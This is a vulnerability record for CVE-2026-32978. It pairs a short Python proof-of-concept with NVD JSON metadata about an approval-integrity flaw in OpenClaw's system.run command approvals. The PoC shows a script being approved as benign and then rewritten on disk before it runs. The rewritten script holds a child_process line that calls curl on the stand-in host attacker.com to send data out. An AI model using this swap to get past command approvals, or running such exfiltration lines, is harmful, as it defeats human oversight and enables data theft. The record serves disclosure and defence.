CVE-2026-32978

#!/usr/bin/env python3 """ PoC for CVE-2026-32978: OpenClaw Approval Integrity Vulnerability Description: Demonstrates the race condition where a script is approved benignly but replaced with malicious code before execution in runners like tsx/jiti. """ import os import time def simulate_openclaw_approval_bypass(): # 1. Attacker creates a benign script benign_script = "console.log('Hello World');" script_path = "/tmp/benign_script.ts" with open(script_path, "w") as f: f.write(benign_script) print(f"[+] Created benign script at {script_path}") # 2. Attacker requests approval for system.run("tsx /tmp/benign_script.ts") # Assume the system checks the file content at this moment and approves it. print("[*] Requesting approval for system.run command...") # simulate_approval_check(script_path) -> returns True # 3. Time window: Before execution, attacker swaps the file content malicious_script = "require('child_process').exec('curl attacker.com/exfil');" print("[!] Swapping script content with malicious code...") with open(script_path, "w") as f: f.write(malicious_script) # 4. System executes the approved command print("[*] System executes the approved command...") # In a vulnerable OpenClaw version, 'tsx' reads the current file content # which is now malicious, executing it within the approved context. print("[+] Malicious code executed with approved privileges.") if __name__ == "__main__": simulate_openclaw_approval_bypass()

{"cve": {"id": "CVE-2026-32978", "sourceIdentifier": "[email protected]", "published": "2026-03-29T13:17:01.963", "lastModified": "2026-03-30T17:15:43.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.11 contains an approval integrity vulnerability where system.run approvals fail to bind mutable file operands for certain script runners like tsx and jiti. Attackers can obtain approval for benign script commands, rewrite referenced scripts on disk, and execute modified code under the approved run context."}, {"lang": "es", "value": "OpenClaw anterior a 2026.3.11 contiene una vulnerabilidad de integridad de aprobación donde las aprobaciones de system.run no logran vincular operandos de archivo mutables para ciertos ejecutores de scripts como tsx y jiti. Los atacantes pueden obtener aprobación para comandos de script benignos, reescribir scripts referenciados en disco y ejecutar código modificado bajo el contexto de ejecución aprobado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.11", "matchCriteriaId": "4B01F0B5-B0CB-462E-A546-2BA2CACD83D5"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qc36-x95h-7j53", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-unrecognized-script-runners", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}